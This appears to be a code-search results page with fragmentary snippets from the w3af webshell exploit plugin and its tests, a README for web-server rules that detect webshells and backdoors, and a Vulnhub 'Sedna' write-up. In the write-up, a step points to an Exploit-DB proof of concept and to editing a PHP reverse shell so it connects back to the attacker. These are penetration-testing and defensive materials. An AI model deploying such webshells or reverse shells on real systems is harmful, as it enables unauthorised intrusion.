127 if shell_handler.SHELL_IDENTIFIER in response.get_body():
128 return exploit_url
129
136 for shell_str, orig_extension in shell_handler.get_webshells(extension):
137 # If the webshell was webshell.php this will return a file_name
138 # containing kgiwjxh.php (8 rand and the extension)
177
178 self._exploit_url = exploit_url
179
223 """
224 return self.__class__, (self._vuln, None, None, self._exploit_url)
README.md https://bitbucket.org/lazy_dogtown/doxi-rules.git | Markdown | 99 lines
64hint for hacked / misused / C&C-servers and tries to detect
65web-backdoors, webshells and other malicious access to unwanted
66files/services.
83
84- detect exploit/misuse-attempts againts web-applications; please see
85scanner.rules for some details on webapp-based scanners
89- generic rules to protect a webserver from misconfiguration
90and known mistakes / exploit-vectors
91
test_shell_handler.py https://github.com/andresriancho/w3af.git | Python | 119 lines
24
25from w3af.plugins.attack.payloads.shell_handler import (get_webshells,
26 get_shell_code)
69 def test_get_web_shell_extension(self):
70 shells = get_webshells('php')
71
80 def test_get_web_shell_code_extension_force(self):
81 shells = get_webshells('php', True)
82
90 def test_get_web_shell_code_no_extension(self):
91 shells = get_webshells('')
92
96 def test_get_web_shell_code_invalid_extension(self):
97 shells = get_webshells('123456')
98
2020-09-19-sedna-vulnhub.md https://github.com/wulfgarpro/wulfgarpro.github.io.git | Markdown | 193 lines
52
53Download the non-Metasploit PoC with EDB-ID [40390](https://www.exploit-db.com/exploits/40390):
54
87
88Copy _/usr/share/webshells/php/php-reverse-shell.php_ from Kali's bundled webshells and update the connect back IP address/port to be the attacking IP address/port:
89
89
90
91